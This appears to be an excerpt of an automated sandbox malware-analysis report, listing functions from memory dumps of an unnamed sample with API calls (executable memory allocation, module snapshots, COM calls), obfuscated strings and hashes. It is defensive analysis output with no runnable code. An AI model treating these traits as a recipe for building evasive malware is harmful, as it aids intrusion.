Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

Function 0091003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0091024D

Strings

cess, xrefs: 0091018D
kernel32.dll, xrefs: 0091008F, 00910095

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f9d09aedfadddf6785d1a2a1ba0e39111bf1b4f7a53faa66e4465624c837c3fe
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F5527774A00229DFDB64CF68C984BA8BBB1BF49304F1480D9E94DAB251DB71AEC5DF14

Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Strings

ilmn, xrefs: 0043AB7D

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID: ilmn
API String ID: 2020703349-1560153188
Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Function 009BB086 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009BB0AE
Module32First.KERNEL32(00000000,00000224), ref: 009BB0CE

Memory Dump Source

Source File: 00000001.00000002.2124427014.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9ba000_5759.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 394969e05f66b927eca07ec7460b9fa66b669ac7699959572003d0593925adbd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E0F062311007156FD7303AB5998DBBB76ECAF89735F100528E652924C4DBB0EC458A61

Function 00910E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00910223,?,?), ref: 00910E19
SetErrorMode.KERNELBASE(00000000,?,?,00910223,?,?), ref: 00910E1E

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 528652e3d4e3a6591c226d85775ae6f7522507528a320a02b3051d7adb2ecc2a
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FBD0123124512C77DB002A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B1998046E5

Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E

Function 009BAD45 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009BAD96

Memory Dump Source

Source File: 00000001.00000002.2124427014.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9ba000_5759.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f9ce522972205fbc4b305b4e2a41d5f8d4d133e1d75deac0c9fc482a1800c46e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 7C113C79A00208EFDB01DF98CA85E99BBF5AF48351F058094F9489B362D375EA50DF80

Non-executed Functions

Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
SysAllocString.OLEAUT32(w!s#), ref: 004364FB
SysAllocString.OLEAUT32(A3q5), ref: 004365A1
VariantInit.OLEAUT32(?), ref: 00436613
VariantClear.OLEAUT32(?), ref: 00436775
SysFreeString.OLEAUT32(?), ref: 004367A0
SysFreeString.OLEAUT32(?), ref: 004367A6
SysFreeString.OLEAUT32(00000000), ref: 004367B3

Strings

BC, xrefs: 00436565
w!s#, xrefs: 004364F6, 004364FA
A;, xrefs: 0043643C
z7}9A3q5, xrefs: 004365BB
T'g), xrefs: 0043652D
Y/9Q, xrefs: 0043653D
C, xrefs: 00436369
X&c8, xrefs: 0043628F

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
API String ID: 2485776651-4124187736
Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

Function 00933C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

UW, xrefs: 009340FF
>V, xrefs: 00934417
IK, xrefs: 009340EA
EG, xrefs: 009340E3
|~, xrefs: 00934295
<>, xrefs: 00934317
>V, xrefs: 009345BD
4%, xrefs: 00933F3C

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: 4f7662d39c01ddca725373c75e29fd39d7ab8baff23f5a7c0d610c36b15c2d5e
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: F93242B0601B469FDB48CF26D580389BBB1FF45300F548698C9695FB5ADB35A892CFC0

Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

IK, xrefs: 00423E83
UW, xrefs: 00423E98
>V, xrefs: 00424356
|~, xrefs: 0042402E
EG, xrefs: 00423E7C
<>, xrefs: 004240B0
>V, xrefs: 004241B0
4%, xrefs: 00423CD5

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0

Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
@iB, xrefs: 0042693A, 00426DD8, 00426E0E
67, xrefs: 0042677F
*mB, xrefs: 00426D24

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: *mB$67$@iB$V3R5
API String ID: 0-119712241
Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86

Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

<k;m, xrefs: 0042069D
&', xrefs: 00420966
0c=e, xrefs: 0042068D
2g1i, xrefs: 00420695
wy, xrefs: 00420675
B, xrefs: 00420ADF

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$B$wy
API String ID: 0-2430453506
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46

Function 0093C8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0093CC69
zJyL, xrefs: 0093CDB0
5, xrefs: 0093CB84
&=, xrefs: 0093CC7F
0, xrefs: 0093CB22
EF, xrefs: 0093CDD1

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: d7c36008915da546bc14c0ac091f7db7396651f4877ed3f572b5307f3fd63e03
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 8EB1097110C7818BE364CF2984917BBFBD6AFD2304F188A6DE4D99B291DB788549CB13

Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

0, xrefs: 0042C8BB
&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757

Function 009189F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00918A1B
GetCurrentThreadId.KERNEL32 ref: 00918A25
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00918AC2
GetForegroundWindow.USER32 ref: 00918AD7
ExitProcess.KERNEL32 ref: 00918BD9

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: 8174dafc96a46368e9493477a61e6001f9fbd6f2b0e31ccbeb2361bb4ba6e792
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 21417F77F8431807D71CAE74DC5A3ABF69A9BC4314F0A803E6D85AB390DD785C4552C1

Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

)*, xrefs: 00423216
r1B, xrefs: 00423169
X9{;, xrefs: 0042330B

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: )*$X9{;$r1B
API String ID: 0-1001561910
Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON

Download Yara Rule

Strings

de, xrefs: 0041C34D
C\, xrefs: 0041C1F0
Iz, xrefs: 0041C15F
[^, xrefs: 0041C1E8
-, xrefs: 0041C167

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: -$C\$Iz$[^$de
API String ID: 0-3020956940
Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Function 00930817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON

Download Yara Rule

Strings

0c=e, xrefs: 009308F4
<k;m, xrefs: 00930904
2g1i, xrefs: 009308FC
wy, xrefs: 009308DC
&', xrefs: 00930BCD

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$wy
API String ID: 0-3335612808
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: 398571f755f9b52228ca55686ff62f26050e604d441a02b47b3aa8585c601c4e
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: DED1F8B56183018BD724DF25C86276BB7F2FFE2314F18996CE4928B394E7799801CB52

Function 0093C94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0093CC69
zJyL, xrefs: 0093CDB0
5, xrefs: 0093CB84
&=, xrefs: 0093CC7F
EF, xrefs: 0093CDD1

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: 2a25808dbd9af1f403121e60cfde3f6b0aa8896722428a49f8d1fc1f77e3bbb9
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 7FA10A7110C7818BE368CF2984917BBFBD6AFD2304F188A6DD4D997291DB748449CB17

Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757

Function 0093C99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0093CC69
zJyL, xrefs: 0093CDB0
5, xrefs: 0093CB84
&=, xrefs: 0093CC7F
EF, xrefs: 0093CDD1

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: a1a47ff0c3baf4b74419d9143cb985592d8de0120b83ca9875c58a903c5aef90
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: FEA10A7110C7818BE364CF2984917ABFBD6AFD2304F288A6DD4D997291DB748449CB17

Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757

Function 0093C98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0093CC69
zJyL, xrefs: 0093CDB0
5, xrefs: 0093CB84
&=, xrefs: 0093CC7F
EF, xrefs: 0093CDD1

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 8784318960a04bfea28b037722ea81baac493b13b4600151b636a143f596b635
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: 83A107B010C7818ED324CF2984917BBFBD6AFD2304F288A6DD4D99B291DB748449CB53

Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
